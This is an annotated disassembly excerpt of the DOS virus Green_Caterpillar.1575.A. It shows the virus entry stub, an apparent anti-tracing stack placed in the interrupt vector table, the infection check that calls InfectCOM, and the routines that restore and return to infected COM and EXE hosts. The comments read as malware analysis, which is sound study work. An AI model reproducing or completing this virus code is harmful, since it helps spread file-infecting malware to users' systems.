📄 gc1575a.asm
; Green_Caterpillar.1575.A
; TASM /M
; One byte-aligned code segment holds both the code and its data, so every
; variable below is reached through CS (or through DS/ES after they are set to CS).
seg000 segment byte public 'CODE'
assume cs:seg000
; Offsets in this listing are relative to 100h, the entry offset of a DOS .COM image.
org 100h
assume es:nothing, ss:nothing, ds:seg000
; start / RealStart -- entry stub, data area and first-stage setup.
;
; What the visible code does, in order:
;   1. Jumps over the embedded data area.
;   2. Saves the entry ES/DS on the stack and the entry ES/SS in StoreES/StoreSS.
;   3. Writes 02h to port 20h (8259A interrupt controller).
;   4. Copies the first 16 bytes of segment 0 (the INT 0..INT 3 vector slots)
;      into byte_0_13C.
;   5. Moves the stack to 0000:0008, i.e. into the interrupt vector table,
;      keeping the previous SP in BP.
;   6. Calls sub_0_1C5, then jumps to StoreFilename (not part of this excerpt).
;
; Analyst note: steps 4-5 are the behaviour most useful for recognising this
; code in an emulator or trace -- a stack at 0000:0008 grows down over the
; INT 1 (single-step) and INT 0 vector slots. This looks like an anti-tracing
; measure; that reading is an inference, not something the listing states.
start proc near
; 2-byte short jump plus one 90h (NOP) filler byte: 3 bytes at offset 100h.
jmp short RealStart
db 90h
; Named for saved INT 21h / INT 1Ch vectors (offset, segment). Nothing in this
; excerpt reads or writes them -- TODO confirm against the rest of the listing.
Int21Ofs dw 0
Int21Seg dw 0
Int1COfs dw 0
Int1CSeg dw 0
; RestoreCOM copies the 12 bytes starting at exeHeader over offset 100h before
; returning to the host, so this area holds the host's saved leading bytes.
; In this copy they are CD 20 (int 20h, DOS terminate), 90 90, then zeros.
; The exe* names suggest the same area doubles as a saved EXE header -- the
; excerpt only shows exeSS and exeCS being read (in RestoreEXE).
exeHeader dw 20CDh
exeMOD dw 9090h
exeDIV dw 0
exeNumSeg dw 0
exeHeadSize dw 0
exeMinPara dw 0
exeMaxPara dw 0
exeSS dw 0
exeSP dw 0
exeCheckSum dw 0
exeIP dw 0
exeCS dw 0
; StartCS / StartIP / StartSS / StoreBP are read by RestoreEXE to rebuild the
; host's CS:IP and SS:SP.
StartCS dw 0
StartIP dw 0
FileSizeHW dw 0
FileSizeLW dw 0
; Entry SS, written by RealStart.
StoreSS dw 0
DTAOffset dw 0
DTASegment dw 0
StartSS dw 0
StoreBP dw 0
; Entry ES, written by RealStart.
StoreES dw 0
Int24Seg dw 0
Int24Ofs dw 0
; Initial value 16; presumably a counter -- not referenced in this excerpt.
GenCounter db 16
; 16-byte buffer at offset 13Ch. RealStart overwrites it with the bytes at
; 0000:0000..000Fh (mov di, 13Ch / mov cx, 16 below).
byte_0_13C db 7, 57h, 75h, 2, 5Ch, 7, 70h, 0, 16h, 0, 0BFh, 0Bh, 5Ch, 7, 70h, 0
RealStart:
; Keep the entry ES and DS on the stack; RestoreCOM and RestoreEXE begin with
; matching pops (assumes the original stack is back in place by then -- the
; switch back is not shown in this excerpt).
push es
push ds
mov ax, es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov StoreES, ax ; StoreES = entry ES
mov ax, ss
mov StoreSS, ax ; StoreSS = entry SS
; Write 02h to the master 8259A command port.
; NOTE(review): the intended effect of the value 02h is not evident from this listing.
mov al, 2
out 20h, al ; Interrupt controller, 8259A.
cld ; string operations count upwards
xor ax, ax
mov ds, ax ; DS points to IVT
assume ds:nothing
; Copy 16 bytes from 0000:0000 to ES:13Ch (ES = CS, so into byte_0_13C).
; The REPNE prefix on MOVSB behaves like a plain REP: the copy runs CX times.
xor si, si
mov di, 13Ch
mov cx, 16
repne movsb
; Move the stack into segment 0: SS = 0, SP = 8, BP = previous SP.
; Anything pushed from here on lands in the INT 1 / INT 0 vector slots.
push ds
pop ss ; SS = DS
assume ss:nothing
mov bp, 8
xchg bp, sp
; Near call: the return offset is pushed to 0000:0006. sub_0_1C5 is declared
; "proc far" but is entered with a near-call override and returns with retn.
call near ptr sub_0_1C5
; Reached only if sub_0_1C5 returns; StoreFilename is outside this excerpt.
jmp StoreFilename
start endp
; FixupInts -- decision point between the infection path and handing control
; back to the host program.
;
; The helper routines called here (GetInt24Vecs, CheckInfection, InfectCOM,
; GetIntVectors, CheckForInstall) and the FileType variable are defined outside
; this excerpt; their names come from the disassembly and their behaviour is
; not verified here.
FixupInts:
call GetInt24Vecs
call CheckInfection
; ZF set on return is treated as "target already infected".
jz AlreadyInf ; Infected Already? Then JMP.
; Preserve FileType across InfectCOM, which presumably changes it.
mov al, ds:FileType
push ax
call InfectCOM
pop ax
mov ds:FileType, al
jmp short RestoreFile
nop
AlreadyInf:
call GetIntVectors
call CheckForInstall
; FileType = 0 means there is no host to return to: terminate through DOS
; (INT 21h, AH = 4Ch, return code 0).
cmp ds:FileType, 0 ; No File Type?
jnz RestoreFile ; No? Then JMP.
mov ax, 4C00h
int 21h ; Exit To DOS
; Dispatch on host type: 'C' takes the COM path, anything else the EXE path.
RestoreFile: ; COM File?
cmp ds:FileType, 'C'
jnz RestoreEXE ; No? Then JMP.
; RestoreCOM -- put the host's first 12 bytes back at offset 100h and far-return
; to it. Also reached from sub_0_1C5.
RestoreCOM:
; Undo the "push es / push ds" done at RealStart.
pop ds
assume ds:seg000
pop es
assume es:nothing
push cs
pop ds ; DS = CS
; Peek the word on top of the stack into ES without removing it. That word is
; used twice: as the copy destination segment and as the CS popped by retf.
pop es
push es
; Copy 12 bytes from DS:exeHeader (the saved host bytes) to ES:0100h.
; REPNE on MOVSB acts as a plain REP.
mov di, offset start
mov si, offset exeHeader
mov cx, 12
repne movsb ; Restore Original 12 Bytes
push es
pop ds ; DS = ES
; Build the far-return frame: IP = offset start (100h) on top of the segment
; word already on the stack. Control is handed over with AX = 0.
mov ax, offset start
push ax
xor ax, ax
retf ; Return to Original COM Program
; sub_0_1C5 -- three-way dispatch on the word stored at DS:0006h, followed by
; the EXE hand-back routine (RestoreEXE).
;
; When entered from RealStart, DS = SS = 0 and SP was 8 before the near call,
; so the call's return offset was written to 0000:0006 -- the word read here.
; NOTE(review): 192h, 179h and 1DCh look like code offsets inside this image;
; confirm against an assembled listing before relying on that.
;
; Outcomes:
;   AX = 192h -> RestoreCOM (defined before this proc)
;   AX = 179h -> loc_0_27F  (outside this excerpt)
;   AX = 1DCh -> RestoreEXE
;   otherwise -> near return to the caller
sub_0_1C5 proc far
mov si, 6
lodsw ; AX = word at DS:0006h
cmp ax, 192h
jz RestoreCOM
cmp ax, 179h
jnz loc_0_1D6
jmp loc_0_27F
loc_0_1D6:
cmp ax, 1DCh
jz RestoreEXE
; Near return although the proc is declared far; matches the near-call override
; used at the call site in RealStart.
retn
; RestoreEXE -- rebuild the host's SS:SP and CS:IP from saved values and
; far-return to it. Also reached from RestoreFile.
RestoreEXE:
; Undo the "push es / push ds" done at RealStart.
pop ds
pop es
; Host SS = CS - (exeSS - StartSS).
mov bx, cs:exeSS
sub bx, cs:StartSS
mov ax, cs
sub ax, bx
mov ss, ax
assume ss:nothing
; Host SP = StoreBP (BP receives the old SP as a side effect of the exchange).
mov bp, cs:StoreBP
xchg bp, sp
; Host CS = CS - (exeCS - StartCS); pushed first so retf pops it after IP.
mov bx, cs:exeCS
sub bx, cs:StartCS
mov ax, cs
sub ax, bx
push ax
; Host IP = StartIP.
mov ax, cs:StartIP
push ax
retf ; far return to host CS:IP
sub_0_1C5 endp
Caterpillar db '#'
db 1Ah
db '<'
db '#'
db '/'
db '-'
db '-'
db '!'
db '.'
db '$'
db 0Eh
db '#'
db '/'
db '-'
db '